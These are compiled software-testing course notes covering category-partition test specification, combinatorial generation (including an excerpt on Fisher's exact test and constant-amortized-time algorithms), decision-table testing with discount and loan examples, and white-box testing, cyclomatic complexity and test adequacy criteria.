For each category, the tester determines different cases against which the functional unit

must be tested.

Each case is also referred as a choice.

It is useful to partition each category into at least two subsets, a set containing correct

values and another consisting of erroneous values.

code:

length

Valid (eight digits)

Invalid (less than or greater than eight digits)

leftmost digit

0

2

3

5

others

remaining digits

valid string

invalid string (eg. 0X5987Y)

qty:

integer

valid quantity

invalid quantity (eg. 0)

weight:

float

valid weight

invalid weight (eg. 0)

Environments:

database:

contents

item exists

item does not exist

Step 4: Identify Constraints

A test for a functional unit consists of a combination of choices for each parameter and

environment object.

Certain combinations might not be possible while others must satisfy specific

relationships.

Constraints among choices are specified in this step.

A constraint is specified using a property list and a selector Expression.

A property list has the following form:

[property P1, P2, ……]

where property is a key word and P1, P2 etc. are names of Individual properties.

Each choice can be assigned a property.

A selector expression is a conjunction of pre-defined properties specified in some

property list.

A selector expression takes one of the form:

[if P]

[if P and P2 and..]

The above two forms can be suffixed to any choice.

A special property written [error] can be assigned to choices that represent error

conditions.

Another special property as [single] allows the tester to specify that the associated choice

is not to be combined with choices of other parameters, or environment objects,

while generating test frames in step 6.

# Leftmost digit of code

0 [property ordinary-grocery]

2 [property variable-weight]

# Remaining digits of the code

valid string [single]

# Valid value of qty

valid quantity [if ordinary-grocery]

# Incorrect value of qty

invalid quantity [error]

Step 5: (Re) Write Test specification (TSL)

code:

length

Valid

Invalid [error]

leftmost digit

0 [property ordinary-grocery]

2 [property variable-weight]

3 [property Health-related]

5 [property Coupon]

remaining digits

Valid string

Invalid string [error]

qty:

Valid quantity

Invalid quantity [error]

weight:

Valid weight [if variable-weight]

Invalid weight [error]

Environments:

database:

contents

item exists

item does not exist [error]

Step 6: Process specification

Test case 2: (key = 1.2.1.0.1.1)

Length: valid

Leftmost digit: 2

Remaining digits: valid

qty: ignored

weight: 3.19

database: item exists

Step 7: Evaluate generator output

Step 8: Generate Test scripts

A test script is a group of test cases

Limitations

� Does not find performance, stress related defects

� Size of the test suite

� Subjectivity is reduced but still persists in identifying categories or choices

Combinatorial generation

The goal of combinatorial generation is to exhaustively produce a set of combinatorial objects, one at a time, often subject to some constraints, and often in a certain required order.

Combinatorial generation problems encompass a wide range of problems, from relatively simple (e.g. generating all subsets or all permutations) to rather complex (e.g. generating all ideals of a poset in Gray order).

Algorithms for combinatorial generation are often divided into iterative and recursive categories. Iterative algorithms have traditionally been considered superior in performance due to the overload of repetitive function calls in recursive algorithms. Arguably, this advantage is less noticeable when recursion is used properly (no redundant subtrees in the recursion tree) and modern compilers are used. Recursive algorithms, on the other hand, often have the advantage of being easier to read and understand.

These two types of algorithms can be further considered as ways of approaching a combinatorial generation problem. That is, there are a few problem-solving strategies that work naturally with each type of algorithm. For example, with recursion, the main strategy involves reducing the problem to a subproblem. Similarly, with iterative algorithms the strategy of finding the next object in lexicographic order is quite commonly used and is rather powerful. Approaches that use the algebraic or arithmetic properties of the objects generated are also often used in iterative algorithms. We will see some examples of all of these in this article.

Coroutines, which can be seen as a generalization of functions, can encompass both recursive and iterative algorithms. As such, they provide an ideal mechanism for combinatorial generation. In fact, one of the most popular coroutine use patterns in modern programming languages is the generator pattern, which we will discuss in next section. As the name suggests, generators provide the perfect mechanism for implementing combinatorial generation algorithms, recursive or iterative.

In addition, since coroutines are a generalization of functions, we can exploit their generality to come up with combinatorial generation algorithms that are arguably somewhere between recursive and iterative. These algorithms introduce a new strategy for approaching combinatorial generation, which can be taken as a third approach, in addition to recursive and iterative approaches.

What is CombinatorialGeneration?

“Let’s look at all the possibilities.” This phrase sums up the outlook of this book. Incomputer science, mathematics, and in other fields it is often necessary to examine all ofa finite number of possibilities in order to solve a problem or gain insight into the solutionof a problem. These possibilities often have an underlying combinatorial structure whichcan be exploited in order to obtain an efficient algorithm for generating some appropriaterepresentation of them.

1.1 Some Examples

1.1.1 Fisher’s Exact Test

Sir R.A. Fisher described an experiment to test a woman who claimed that she coulddistinguish whether the milk or tea was poured first in a cup of tea and milk. Eight cups oftea were prepared, 4 in which milk came before tea and 4 with tea before milk. The womanknows that there will be 4 of each type. The results were as shown below in what’s calleda 2 by 2 contingency table.

Guess Poured FirstPoured First Milk Tea

Milk 3 1 4Tea 1 3 4

The probability that a particular contingency table T occurs follows a multinomialdistribution, where x1 and x2 are the entries in the first column, n1 and n2 are the rowtotals, and N = n1 + n2.

Prob(T ) =

(n1

x1

)(n2

x2

)(

Nx1+x2

)

The typical questions that a statistician wishes to answer are: (1) How many tableshave a lower probability of occurring than the observed table? (2) What is the sum ofprobabilities of tables having a value of x1 at least as large as what’s observed?

In our example, the value of(

Nx1+x2

)is 70, and the possible probabilities are given in

the table below.

3

4 CHAPTER 1. WHAT IS COMBINATORIAL GENERATION?

x1 x2 numerator probability0 4

(40

)(44

)= 1 1/70 = 0.0142857

1 3(41

)(43

)= 16 16/70 = 0.2285714

2 2(42

)(42

)= 36 36/70 = 0.5142857

3 1(43

)(41

)= 16 16/70 = 0.2285714

4 0(44

)(40

)= 1 1/70 = 0.0142857

Answering each of these questions involves the generation of combinatorial objects. Inthis case the generation is particularly simple. We wish to compute the value of Prob(T )for all those values of x1 and x2 for which x1 + x2 = 4, with the additional constraints thatx1 ≤ n1 = 4 and x2 ≤ n2 = 4. The combinatorial objects being generated are the pairs(x1, x2).

In the more general setting of a k by 2 contingency table, we need to generate allsolutions to

x1 + x2 + · · ·+ xk = r1 subject to 0 ≤ xi ≤ ni.

Algorithms for generating these objects, which we call combinations of a multiset, arepresented in Section 4.5.1.

1.1.2 A Second Example

This subsection is yet to be written.

1.2 Elementary Objects

There is no precise definition of an elementary combinatorial object. Our intuitive notionis that if a class of combinatorial objects satisfies a simple recurrence relation then it iselementary. We make no attempt to define “simple recurrence relation.” However, weconsider permutations, combinations, set partitions, numerical partitions, binary trees andlabeled graphs to all be elementary combinatorial objects; while unlabeled graphs, roomsquares, and unlabeled partially ordered sets are not elementary.

Many recurrence relations many be stated in a form that involves no division or subtrac-tion, only multiplication and addition, and further that involve only positive values, eventhe base cases. Such recurrence relations are said to be positive. Given a simple recurrencerelation describing an elementary combinatorial object, it is typically straightforward to de-velop an algorithm for generating a natural representation of that object. If the recurrencerelation is positive, then the algorithm is often efficient in an amortized sense. This pointof view was perhaps first explored by Wilf in two papers [448], [449], and we have more tosay on this subject in Section 4.9.

Most of the book is devoted to elementary objects, namely Chapters 4, 5, and 6. Non-elementary objects are generated in Chapters 3 and 8.

1.3 Four Basic Questions

We consider in this book 4 basic questions: listing, ranking, unranking, and random selec-tion, of which the listing question is of paramount importance.

[listing] Algorithms for generating combinatorial objects come in two varieties. Eitherthere is a recursive procedure, call it GenerateAll, that typically has the same recursive

uvic01, c©Frank Ruskey, 1995–2001

1.3. FOUR BASIC QUESTIONS 5

structure as a recurrence relation counting the objects being generated, or there is a proce-dure, call it Next, that takes the current object, plus possibly some auxiliary information,and produces the next object. Typically, but not always, Next is iterative. Throughout thebook we assume that Next is used by a section of code as shown below.

Initialize; {includes done := false }repeat

PrintIt;Next;

until done;

The boolean variable done is global and is eventually set true by Next. If Next containsno loop then the generation algorithm is said to be loopless. Another term one sometimessees in connection with iterative generation algorithms is memoryless. This simply meansthat Next contains no global variables whose value changes; the algorithm can be startedwith any object.

Many older papers start with a nice recursive decomposition of the class of objects to begenerated and then jump immediately into the development of a iterative Next routine. Thisunfortunate habit has turned many a beautiful decomposition into an ugly program. Onewould sometimes see this uglification justified by a sentence stating that recursion was slowbecause of the overhead involved in making procedure calls and passing parameters.1 Thisjustification can no longer be accepted! It’s a throwback to a by-gone era. Most modernmachines include hardware to speed procedure calls. The Sun workstation sitting on theauthor’s desk has banks of “window” registers that make recursive programs written in Cfaster than their iterative counterparts! For these reasons, the vast majority of generationalgorithms presented in this book are recursive.

However, there are at least two compelling reasons why iterative Next routines areuseful — these reasons are due to more modern trends in computing. First is the cause ofmodularization. Iteration and recursion generation procedures present two opposite viewsto the user. Iteration says “Give me and object and I’ll give you the next one”. Recursionsays “Give me the procedure that uses the object and I’ll apply it to every object”. Thesecond reason is that iterative procedures are often more amenable to parallel computation.

Sometimes it is desirable to have a listing of objects in which successive objects are“close” in some well-defined sense. Such listings are called Gray Codes, and are the subjectsof Chapter 5 and Chapter 6.

[ranking] Relative to an ordering of a set of combinatorial objects, such as the orderingimposed by a generation algorithm, the rank of an object is the position that the objectoccupies in the ordering. Our counting begins at 0 so another way of defining the rank isas the number of objects that precede it in the list2. One of the primary uses of rankingalgorithms is that they provide “perfect hashing functions” for a class of combinatorialobjects. The existence of a ranking algorithm allows you to set up an array indexed bythe objects. Ranking (and unranking) is generally only possible for some of the elementarycombinatorial objects.

[unranking] Unranking is the inverse process of ranking. To unrank an integer r isto produce the object that has rank r. Unranking algorithms can be used to implement

1Or perhaps that the language being used didn’t support recursion.2In the literature many ranking algorithms begin counting at 1.



parallel algorithms for generating combinatorial objects, when used in conjunction with aNext procedure. For more on this see Chapter ?? For this reason we try ensure that ourunranking algorithms return enough information for Next to be restarted from any object.

[random selection] Here we want to produce a combinatorial object uniformly atrandom. An unranking algorithm can be used, but often more direct and efficient methodscan be developed. This is an important topic, and is treated in Chapter 10, but is not amain focus of this book.

1.4 A Word about the Algorithms

It is hoped that the contents of this book are not only interesting but also useful. Thealgorithms in this book have been presented in a pseudo-code. In most cases it should bea trivial exercise to translate these algorithms into languages such as C, C++, Java, orPascal. The most important difference in our pseudo-code from those languages is thatthe scope of statements is indicated by indentation, rather than by the use of parentheses,as in C, C++, and Java, or by the use of begin, endpairs, as in Pascal. In spirit ouralgorithms are closest to Pascal. Procedures that do not return a value are indicated bythe reserved word procedure (these are like void procedures and methods in C and Java.Those that return a value are indicated by the reserved word function . The return typeof the function is indicated after the parameter list, as infunction ( 〈 parameter list 〉 ) : 〈 return type 〉;Following Knuth, we use x :=: y to indicate the swap of the values of two variables; i.e., itis shorthand for t := x; x := y; y := t. Also, we allow for multiple (parallel) assignmentstatements as [x, y] := [e, f ] to indicate the assignments x := e and y := f , executed inparallel. The notations ai and a[i] will be used interchangeably and a[i..j] indicates thesubarray of a indexed from i to j. Arrays can be declared over an arbitrary range; i.e., notnecessarily starting from 0, as in C and Java.

Linked structures are not often used in this book, but when they are we adopt simple“dot” notation to denote fields within nodes.

1.5 The Representation Issue

There are typically many ways to represent a combinatorial object, and these different rep-resentations may lead to wildly differing algorithms for generating the objects. For example,permutations may be represented in one-line notation, in cycle notation, by inversion tables,or even by permutation matrices; binary trees may be represented as a linked data struc-ture, as well-formed parentheses strings, as triangulations of convex polygons, or as orderedtrees, as well as many other sequence representations. Which representation is most usefulusually depends upon the application that requires the objects to be generated. This is amatter over which the author of the book has no control.

On the other hand, each object usually has some small number of standard representa-tions, and it is these representations that we try to generate, and that other developers ofgeneration algorithms should try to generate. These standard representations we use arealmost always sequences, usually of fixed length, but not always.

The user of an algorithm for generating combinatorial objects should specify the repre-sentation most useful to them. Assume that we wish to generate some combinatorial family


1.6. COMPLEXITY MEASURES 7

Sn indexed by numbers n, and where sn = |Sn| is known or easily computable. Left up tothe the lazy generator, you might get an algorithm like the following.

“Compute sn”;for i := 1 to sn do Output( i );

Typically the computation of sn is efficient as a function of sn, so that the above algo-rithm is very efficient in an amortized sense. But have we generated Sn? No reasonableperson would think so, since all we are doing is counting, and to get a useful representation,some unranking algorithm still has to be developed.

The point of this discussion is that representations are important and the generator(person developing a generation algorithm) should be careful to use a representation that isuseful to others, and not just convenient because it makes the algorithm simple or efficient.

1.6 Complexity Measures

Not much attention has been paid to the model of computation in the area of combinatorialgeneration. For the most part authors use the random access machine model. This is moreor less like counting operations in a Pascal program, with the understanding that integerscan be arbitrarily large and the assumption that standard arithmetic operations can bedone in constant time. For large integers this is an unrealistic assumption. It is generallythe case that integers are small in generation algorithms, but that they are large in rankingand unranking algorithms. We will therefore measure ranking and unranking algorithms interms of the number of arithmetic operations used.

The complexity of generating combinatorial objects is not well addressed by the classi-cal theory of computational complexity, with its emphasis on the polynomial versus non-polynomial time question, and polynomial and log-space reductions. Most classes of com-binatorial objects with which we are concerned have at least exponentially many elements,and useful reductions of any kind are rare. Some complexity questions are addressed inChapter ??.

An enormous amount of research has gone into getting away from the “brute-force”approach to solving discrete optimization problems, and very fruitful approaches to solvinga wide variety of these problems have been developed. Nevertheless, one is occasionallyforced into the approach of examining all the possibilities and the results of this book shouldbe useful in those instances. Because of the aversion to the brute-force approach, researchin combinatorial generation has never been popular; refining a generation algorithm to moreefficiently solve some discrete optimization problem is like an admission of defeat in thisview. Combinatorial generation is really a part of theoretical computer science, certainlymore so than the complexity of counting, which is now a well-established part of theoreticalcomputer science. Perhaps surprisingly, in the 500+ references in the fairly comprehensivebibliography, there is an almost a total absence of references from the preeminent STOCand FOCS conferences. Perhaps this will change; I hope so.

1.7 Analyzing the Algorithms

There are two terms that are used throughout the book. We strive to develop algorithmsthat have these properties.



CAT Algorithms The holy grail of generating combinatorial objects is to find an algorithmthat runs in Constant Amortized Time. This means that the amount of computation, aftera small amount of preprocessing, is proportional to the number of objects that are listed.We do not count the time to actually output or process the objects; we are only concernedwith the amount of data structure change that occurs as the objects are being generated.

BEST Algorithms This means Backtracking Ensuring Success at Terminals. In otherwords, the algorithm is of the backtracking type, but every leaf of the backtracking tree isan object of the desired type; it is a “success”.

Suppose that the input to our generation algorithm is n, and that this will produce Nobjects, each of “size” n. A CAT algorithm has running time O(N). In the typical appli-cation of combinatorial generation, each object, as it is produced, is processed somehow.If this processing takes time O(n), then having a CAT algorithm has no advantage overhaving one with running time O(nN), since the total running time is O(nN) in either case.

There are are many papers about generating combinatorial objects that describe anO(nN) running time as “optimal”, because this is the amount of output produced by thealgorithm — each object has size n and there are N objects in total. This is a misguidednotion that has its roots in the way lower bounds are discussed in the traditional introductionto complexity theory course. There the “trivial lower bound” says that the amount of outputgives a lower bound on the amount of computation — of course it says the same thing inour setting, but the amount of output is the wrong thing to measure.

Don’t Count the Output Principle: In combinatorial generation it is theamount of data structure change that should be measured in determining the com-plexity of an algorithm; the time required to output each object should be ignored.

The “trivial lower bound” for combinatorial generation is Θ(N); it is independent of n.This may seem suspicious, since it appears to take no account of the time that is frequentlynecessary to initialize the various data structures that are used, but there are many algo-rithms that require only a constant amount of initialization — we will encounter some, forexample, in Chapter 4 on lexicographic generation. Now back to our typical application,where processing each object took time O(n) even though our generation algorithm wasCAT. Wouldn’t it be nice if the O(nN) could be brought down to O(N)? This is frequentlypossible! If you go back and observe how successive objects are processed, it is often thecase that the amount of processing required is proportional to the amount of change thatsuccessive objects undergo.

Decision tables

What is a Decision Table

It is a table which shows different combination inputs with their associated outputs, this is also known as cause effect table.

In EP and BVA we have seen that these techniques can be applied to only specific conditions or inputs however if we have different inputs which result in different actions being taken or in other words we have a business rule to test where there are different combination of inputs which result in different actions.

For testing such rules or logic decision table testing is used.

It is a black box test design technique.

It is divided in four quadrants

Condition : Inputs Condition alternatives/combinations Action : Outputs Action entries

Each decision corresponds to a variable, relation or predicate whose possible values are listed among the condition alternatives. Each action is a procedure or operation to perform, and the entries specify whether (or in what order) the action is to be performed for the set of condition alternatives the entry corresponds to. Many decision tables include in their condition alternatives the don't care symbol, a hyphen. Using don't cares can simplify decision tables, especially when a given condition has little influence on the actions to be performed. In some cases, entire conditions thought to be important initially are found to be irrelevant when none of the conditions influence which actions are performed.

INFORMATION:

Decision Table A decision table is a tabular form that presents a set of conditions and their corresponding actions.

Condition Stubs Condition stubs describe the conditions or factors that will affect the decision or policy. They are listed in the upper section of the decision table.

Action Stubs Action stubs describe, in the form of statements, the possible policy actions or decisions. They are listed in the lower section of the decision table.

Rules Rules describe which actions are to be taken under a specific combination of conditions. They are specified by first inserting different combinations of condition attribute values and then putting X's in the appropriate columns of the action section of the table.

The techniques of equivalence partitioning and boundary value analysis are often applied to specific situations or inputs. However, if different combinations of inputs result in different actions being taken, this can be more difficult to show using equivalence partitioning and boundary value analysis, which tend to be more focused on the user interface. The other two specification-based software testing techniques, decision tables and state transition testing are more focused on business logic or business rules.

http://istqbexamcertification.com/what-is-a-software-testing/

A decision table is a good way to deal with combinations of things (e.g. inputs). This technique is sometimes also referred to as a ’cause-effect’ table. The reason for this is that there is an associated logic diagramming technique called ’cause-effect graphing’ which was sometimes used to help derive the decision table (Myers describes this as a combinatorial logic network [Myers, 1979]). However, most people find it more useful just to use the table described in [Copeland, 2003].

• Decision tables provide a systematic way of stating complex business rules, which is useful for developers as well as for testers.

• Decision tables can be used in test design whether or not they are used in specifications, as they help testers explore the effects of combinations of different inputs and other software states that must correctly implement business rules.

• It helps the developers to do a better job can also lead to better relationships with them. Testing combinations can be a challenge, as the number of combinations can often be huge. Testing all combinations may be impractical if not impossible. We have to be satisfied with testing just a small subset of combinations but making the choice of which combinations to test and which to leave out is also important. If you do not have a systematic way of selecting combinations, an arbitrary subset will be used and this may well result in an ineffective test effort.

Credit card example: Let’s take another example. If you are a new customer and you want to open a credit card account then there are three conditions first you will get a 15% discount on all your purchases today, second if you are an existing customer and you hold a loyalty card, you get a 10% discount and third if you have a coupon, you can get 20% off today (but it can’t be used with the ‘new customer’ discount). Discount amounts are added, if applicable. This is shown in Table 4.8.

TABLE 4.8 Decision table for credit card example

In Table 4.8, the conditions and actions are listed in the left hand column. All the other columns in the decision table each represent a separate rule, one for each combination of conditions. We may choose to test each rule/combination and if there are only a few this will usually be the case. However, if the number of rules/combinations is large we are more likely to sample them by selecting a rich subset for testing.

In Decision Table based Testing, steps we follow include: • Develop Decision Table • Design Test Cases

Now let’s see the decision table for credit card shown above:

• Note that we have put X for the discount for two of the columns (Rules 1 and 2) – this means that this combination should not occur. You cannot be both a new customer and also holding a loyalty card as per the conditions mentioned above. Hence there should be an error message stating this.

• We have made an assumption in Rule 3. Since the coupon has a greater discount than the new customer discount, we assume that the customer will choose 20% rather than 15%. We cannot add them, since the coupon cannot be used with the ‘new customer’ discount as stated in the condition above. The 20% action is an assumption on our part, and we should check that this assumption (and any other assumptions that we make) is correct, by asking the person who wrote the specification or the users.

• For Rule 5, however, we can add the discounts; since both the coupon and the loyalty card discount should apply (that’s our assumption).

• Rules 4, 6 and 7 have only one type of discount and Rule 8 has no discount, so 0%.

http://istqbexamcertification.com/wp-content/uploads/2012/01/Decision-table-for-credit-card-example.jpg

A decision table is a good way to deal with different combination inputs with their associated outputs and also called cause-effect table. Reason to call cause-effect table is an associated logical diagramming technique called ’cause-effect graphing that is basically use to derive the decision table.

Decision table testing is black box test design technique to determine the test scenarios for complex business logic.

We can apply Equivalence Partitioning and Boundary Value Analysis techniques to only specific conditions or inputs. Although, if we have dissimilar inputs that result in different actions being taken or secondly we have a business rule to test that there are different combination of inputs which result in different actions. We use decision table to test these kinds of rules or logic.

Why Decision table is important?

Decision tables are very much helpful in test design technique – it helps testers to search the effects of combinations of different inputs and other software states that must correctly implement business rules. Also, provides a regular way of stating complex business rules, that’s helpful for developers as well as for testers. Testing combinations can be a challenge, as the number of combinations can often be huge. It assists in development process with developer to do a better job. Testing with all combination might be unrealistic or unfeasible. We have to be happy with testing just a small subset of combinations but making the option of which combinations to test and which to leave out is also significant. If you do not have a efficient way of selecting combinations, an arbitrary subset will be used and this may well result in an ineffective test effort.

A decision table is basically an outstanding technique used in both testing and requirements management. It is a structured exercise to prepare requirements when dealing with complex business rules. Also, used in model complicated logic.

Way to use decision tables in test designing

Firstly; get to know a suitable function or subsystem that acts according to a combination of inputs or events. Taken system should be with fewer inputs or else combinations will become impossible. Always better to take maximum numbers of conditions, split them into subsets and use these subsets one at a time. After getting features that need to be combined, add them to a table showing all combinations of “Yes” and “No” for each of the feature.

Let’s take an example of a finance application, where users pay money – monthly Repayment or year wise (the term of loan). If user chooses both options, the system will create a negotiation between two. So, there are two conditions of the loan amount, mention in the given below table,

TABLE 1: Blank decision table

Next, recognize all of the combinations in “Yes” and “No” (In Table 2). In each column of two conditions mention “Yes” or “No”, user will get here four combinations (two to the power of the number of things to be combined). Note, if user has three things to combine, they will have eight combinations, with four things, there are 16, etc. Because of this, it’s always good to take small sets of combinations at once. To keep track on combinations, give alternate “Yes” and “No” on the bottom row, put two “Yes” and then two “No” on the row above the bottom row, etc., so the top row will have all “Yes” and then all “No” (Apply the same principle to all such tables).

TABLE 2: Decision table – Input combination

In the next step, recognize the exact outcome for each combination (In Table 3). In this example, user can enter one or both of the two fields. Each combination is sometimes referred to as a step.

TABLE 3: Decision table – Combinations and outcomes

At this time you didn’t think that what will happen when customer don’t enter anything in either of the two fields. The table has shown a combination that was not given in the specification for this example. This combination can result as an error message, so it is necessary to add another action (In Table 4). This will flash the strength this method to find out omissions and ambiguities in specifications.

TABLE 4: Decision table – Additional outcomes

We will provide you some other example that allows the customer to enter both repayment and term. This will change the outcome of our table, this will generate an error message if both are entered (Shown in Table 5).

TABLE 5: Decision table – Changed outcomes

The final process of this method is to write test cases to use each of the four steps in our table.

Advantage of decision table technique:

1. Any complex business flow can be easily converted into the test scenarios & test cases using this technique.

2. Such type of table are work iteratively, means the table created at the first iteration is used as input table for next tables. Such iteration can be carried out only if the initial table is unsatisfactory.

3. Simple to understand and everyone can use this method design the test scenarios & test cases.

4. It provide complete coverage of test cases which help to reduce the rework on writing test scenarios & test cases.

5. These tables guarantee that we consider every possible combination of condition values. This is known as its “completeness property”.

UNIT IV - STRUCTURAL TESTING

Introduction

What is Structural Testing ?

Structural testing, also known as glass box testing or white box testing is an approach where the tests are derived from the knowledge of the software's structure or internal implementation.

The other names of structural testing includes clear box testing, open box testing, logic driven testing or path driven testing.

Structural Testing Techniques:

• Statement Coverage - This technique is aimed at exercising all programmingstatements with minimal tests.

• Branch Coverage - This technique is running a series of tests to ensure that allbranches are tested at least once.

• Path Coverage - This technique corresponds to testing all possible paths whichmeans that each statement and branch are covered.

Calculating Structural Testing Effectiveness:

Statement Testing = (Number of Statements Exercised / Total Number of Statements) x 100 % Branch Testing = (Number of decisions outcomes tested / Total Number of decision Outcomes) x 100 % Path Coverage = (Number paths exercised / Total Number of paths in the program) x 100 %

Advantages of Structural Testing:

• Forces test developer to reason carefully about implementation • Reveals errors in "hidden" code • Spots the Dead Code or other issues with respect to best programming

practices.

Disadvantages of Structural Box Testing:

• Expensive as one has to spend both time and money to perform white box testing.

• Every possibility that few lines of code is missed accidentally. • Indepth knowledge about the programming language is necessary to perform

white box testing.

• The structural testing is the testing of the structure of the system or component.

• Structural testing is often referred to as ‘white box’ or ‘glass box’ or ‘clear-box testing’ because in structural testing we are interested in what is happening ‘inside the system/application’.

• In structural testing the testers are required to have the knowledge of the internal implementations of the code. Here the testers require knowledge of how the software is implemented, how it works.

• During structural testing the tester is concentrating on how the software does it. For example, a structural technique wants to know how loops in the software are working. Different test cases may be derived to exercise the loop once, twice, and many times. This may be done regardless of the functionality of the software.

• Structural testing can be used at all levels of testing. Developers use structural testing in component testing and component integration testing, especially where there is good tool support for code coverage. Structural testing is also used in system and acceptance testing, but the structures are different. For example, the

coverage of menu options or major business transactions could be the structural element in system or acceptance testing.

White-box testing (also known as clear box testing, glass box testing, transparent box testing, and structural testing) is a method of testing software that tests internal structures or workings of an application, as opposed to its functionality (i.e. black-box testing). In white-box testing an internal perspective of the system, as well as programming skills, are used to design test cases. The tester chooses inputs to exercise paths through the code and determine the appropriate outputs.

Levels

1. Unit testing. White-box testing is done during unit testing to ensure that the code is working as intended, before any integration happens with previously tested code. White-box testing during unit testing catches any defects early on and aids in any defects that happen later on after the code is integrated with the rest of the application and therefore prevents any type of errors later on.

2. Integration testing. White-box testing at this level are written to test the interactions of each interface with each other. The Unit level testing made sure that each code was tested and working accordingly in an isolated environment and integration examines the correctness of the behavior in an open environment through the use of white-box testing for any interactions of interfaces that are known to the programmer.

3. Regression testing. White-box testing during regression testing is the use of recycled white-box test cases at the unit and integration testing levels.

Basic procedure

White-box testing's basic procedures involve the understanding of the source code that you are testing at a deep level to be able to test them. The programmer must have a deep understanding of the application to know what kinds of test cases to create so that every visible path is exercised for testing. Once the source code is understood then the source code can be analyzed for test cases to be created. These are the three basic steps that white-box testing takes in order to create test cases:

1. Input involves different types of requirements, functional specifications, detailed designing of documents, proper source code, security specifications. This is the preparation stage of white-box testing to layout all of the basic information.

2. Processing involves performing risk analysis to guide whole testing process, proper test plan, execute test cases and communicate results. This is the phase of building test cases to make sure they thoroughly test the application the given results are recorded accordingly.

3. Output involves preparing final report that encompasses all of the above preparations and results.


http://en.wikipedia.org/wiki/Black-box_testing

http://en.wikipedia.org/wiki/Black-box_testing

http://en.wikipedia.org/wiki/Regression_testing

Advantages

White-box testing is one of the two biggest testing methodologies used today. It has several major advantages:

1. Side effects of having the knowledge of the source code is beneficial to thorough testing.

2. Optimization of code by revealing hidden errors and being able to remove these possible defects.

3. Gives the programmer introspection because developers carefully describe any new implementation.

4. Provides traceability of tests from the source, allowing future changes to the software to be easily captured in changes to the tests.

5. White box tests are easy to automate. 6. White box testing give clear, engineering-based, rules for when to stop testing.

Disadvantages

Although white-box testing has great advantages, it is not perfect and contains some disadvantages:

1. White-box testing brings complexity to testing because the tester must have knowledge of the program, including being a programmer. White-box testing requires a programmer with a high-level of knowledge due to the complexity of the level of testing that needs to be done.

2. On some occasions, it is not realistic to be able to test every single existing condition of the application and some conditions will be untested.

3. The tests focus on the software as it exists, and missing functionality may not be discovered.

Various Structural Testing are

1. Stress Testing 2. Execution Testing 3. Operations Testing 4. Recovery Testing 5. Compliance Testing 6. Security Testing

White Box testing is a test case design method that uses the control structure of the procedural design to derive the test case. The test cases are derived using white box testing .

http://www.onestopsoftwaretesting.com/stress-testing-simplified/

Characteristics of White Box Testing

• Guarantee that all the independent path with in a module has been checked at least once.

• Check all the logical decisions on their true and false wise. • Execute all the loops at their boundaries. • Check all data structures to ensure their validity

In short the white box testing makes a detailed internal check of the program.

• Basis Path Testing • Control Structure Testing

Basis Path Testing

Basis Path Testing is a white box testing technique. This enables to measure the logical complexity of the procedure to find the execution path.

Cyclomatic Complexity

Cyclomatic Complexity is a software metric to measure the logical complexity of a program.

Cyclomatic Complexity = E – N + 2

Where E is the Number of Edges and N is the Number of Nodes.

The above diagram contains 11 edges and 9 Nodes. So the Cyclomatic complexity is given by

C = E - N + 2

= 11 - 9 + 2

= 4

Control Structure Testing

Control structure testing is a group of white box testing methods.

• Branch Testing • Condition Testing • Data Flow Testing • Loop Testing

Branch testing objective is to execute every possible decision branch at least once. The commonly used branching statements are if, for, while, switch.

Condition testing focuses on testing the logical decisions in the program code. Data flow testing selects test paths according to the location of definitions and use of variables. Loop Testing is a white Box Testing focuses only on the validity of loop constructs. There exists loop constructs of the following type.Simple Loops, Nested Loops, Concatenated Loops and Unstructured Loops.

Techniques of White Box Testing When it comes to white box testing, the knowledge that the tester possesses about the system is the driving factor, which helps the tester to devise test cases aimed at discovering defects with the internal working of the system.

• Statement Tests: All the statements within the code must have a test case associated with it such that each statement must be executed at least once during the testing cycle.

• Decision Tests: All the decision directions must be executed at least once during the testing life cycle.

• Branch Condition Tests: All the conditions in a specific decision must be tested for proper working at least once.

• Decision/Condition Tests: All the combination of the possible conditions within a specific decision for all the decisions is to be tested.

• Data Flow Tests: This will ensure that all the variables and data that are used within the system are tested by passing the specific variables through each possible calculation.

• Multiple Condition Tests: This will ensure that each point of entry within the code is tested at least once during the testing life cycle.

Test adequacy criteria

Predicate that defines “what properties of a program must be exercised to constitute a thorough test”, i.e., one whose successful execution implies no errors in a tested program Reliability requirement – “Test criterion always produces consistent test results” – If a program tested successfully on one test set that satisfies the criterion, then the program also tested successfully on all test sets that satisfy the criterion • Validity requirement – “Test always produces a meaningful result” – For every error in a program, there exists a test set that satisfies the criterion and is capable of revealing the error • There is no computable criterion that satisfies the above requirements What we would like: • A real way of measuring effective testing If the system passes an adequate suite of test cases, then it must be correct (or dependable) • But that’s impossible! • Adequacy of test suites, in the sense above, is provably undecidable. • So we’ll have to settle on weaker proxies for adequacy • Design rules to highlight inadequacy of test suites

Criteria that identify inadequacies in test suites. • Examples – if the specification describes different treatment in two cases, but the test suite does not check that the two cases are in fact treated differently, we may conclude that the test suite is inadequate to guard against faults in the program logic. – If no test in the test suite executes a particular program statement, the test suite is inadequate to guard against faults in that statement.

• If a test suite fails to satisfy some criterion, the obligation that has not been satisfied may provide some useful information about improving the test suite. • If a test suite satisfies all the obligations by all the criteria, we do not know definitively that it is an effective test suite, but we have some evidence of its thoroughness.

Building codes are sets of design rules • Maximum span between beams in ceiling, floor, and walls; acceptable materials; wiring insulation; ... • Minimum standards, subject to judgment of building inspector who interprets the code • You wouldn’t buy a house just because it’s “up to code” • It could be ugly, badly designed, inadequate for your needs • But you might avoid a house because it isn’t • Building codes are adequacy criteria, like practical test “adequacy” criteria

Adequacy criterion = set of test obligations • A test suite satisfies an adequacy criterion if • all the tests succeed (pass) • every test obligation in the criterion is satisfied by at least one of the test cases in the test suite. • Example: the statement coverage adequacy criterion is satisfied by test suite S for program P if each executable statement in P is executed by at least one test case in S, and the outcome of each test execution was “pass”

Satisfiability

Sometimes no test suite can satisfy a criterion for a given program • Example: Defensive programming style includes “can’t happen” sanity checks if (z < 0) { throw new LogicError( ! “z must be positive here!”) }

No test suite can satisfy statement coverage for this program (if it’s correct)

Uses of Adequacy Criteria

Test selection approaches • Guidance in devising a thorough test suite • Example: A specification-based criterion may suggest test cases covering representative combinations of values • Revealing missing tests • Post hoc analysis: What might I have missed with this test suite? • Often in combination • Example: Design test suite from specifications, then use structural criterion (e.g., coverage of all branches) to highlight missed logic

Adequacy criteria provide a way to define a notion of “thoroughness” in a test suite

• But they don’t offer guarantees; more like design rules to highlight inadequacy • Defined in terms of “covering” some information • Derived from many sources: Specs, code, models, ... • May be used for selection as well as measurement • With caution! An aid to thoughtful test design, not a substitute

Overview

